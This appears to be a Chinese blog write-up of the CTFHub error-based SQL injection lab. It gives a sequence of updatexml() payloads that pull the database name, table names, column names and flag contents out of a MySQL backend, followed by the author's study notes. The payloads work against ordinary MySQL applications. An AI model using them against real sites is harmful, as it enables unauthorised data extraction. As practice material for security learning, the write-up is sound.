当前位置：首页 > news >正文

38.【3】CTFHUB web sql 报错注入

news 2025/7/28 10:10:41

进入靶场

按照提示输入1

显示查询正确

既然是报错注入，先判断整形还是字符型注入

先输入1 and 1=1

再输入1 and 1=2

都显示查询正确，可知此为字符串型注入，不是数字型注入

然后就不会了

求助AI和其他wp

由以上2张搜索结果知updatexml是适用于字府串型注入的函数，且知道大概用法，开始注入

爆出库名 1 and updatexml(1,concat(0x7e,database()),3)

爆出表名 1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

爆出字段名 1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3)

并没有显示字段名，添加了库名后才显示，应该是含有多个flag表，添加库名缩小了范围便显示出来了

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag')),3)

爆出字段内容 1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

得到flag

笔记

1，报错注入先判断是字府串型注入还是数字注入

2，判断出类型便可运用相关函数

3，updatexml函数

1 and updatexml(1,concat(0x7e,database()),3)

第一个与第三个参数随便写，因为我们并不用它，参数2处的concat 是一个用于连接字符串的函数，0x7e代表16进制，避免特殊字符造成的错误

查看全文

http://www.lryc.cn/news/523261.html

RC2在线加密工具

NVIDIA 下基于Ubuntun20.04下使用脚本安装 ros2-foxy 和使用docker安装 ros2-foxy

STL容器-- list的模拟实现（附源码）

python——句柄

KubeSphere 与 Pig 微服务平台的整合与优化：全流程容器化部署实践

ESP8266-01S、手机、STM32连接

Web开发 -前端部分-CSS-2

【QT用户登录与界面跳转】

记录一次关于spring映射postgresql的jsonb类型的转化器事故，并使用hutool的JSONArray完成映射

基于 HTML5 Canvas 制作一个精美的 2048 小游戏--day2

Django框架：python web开发

MySQL、HBase、ES的特点和区别

联发科MTK6762/MT6762安卓核心板_4G智能模块应用

Windows7系统下载安装Source Code Pro字库

Navicat 17 功能简介 | 商业智能 BI

C# winodw TableLayoutPanel 料盒生产状态UI自动生成

提示词的艺术----AI Prompt撰写指南（个人用）

哪些前端打印插件可以实现监听用户选择了打印还是取消

【PyCharm】连接Jupyter Notebook

【Linux系统编程】—— 深入理解Linux中的环境变量与程序地址空间

Spark常见面试题-部分待更新

Android BitmapShader实现狙击瞄具十字交叉线准星，Kotlin

linux通过web向mac远程传输字符串，mac收到后在终端中直接打印。

海云安开发者安全智能助手D10荣膺 “ AI标杆产品 ” 称号，首席科学家齐大伟博士入选2024年度 “ 十大杰出青年 ”

Spring Boot + Apache POI 实现 Excel 导出：BOM物料清单生成器（支持中文文件名、样式美化、数据合并）

ReactiveSwift 简单使用

CSS 的基础知识及应用

【Web】2025西湖论剑·中国杭州网络安全安全技能大赛题解(全)

能源物联网数据采集设备串口服务器功能参数介绍

在线json格式化工具

笔记

相关文章：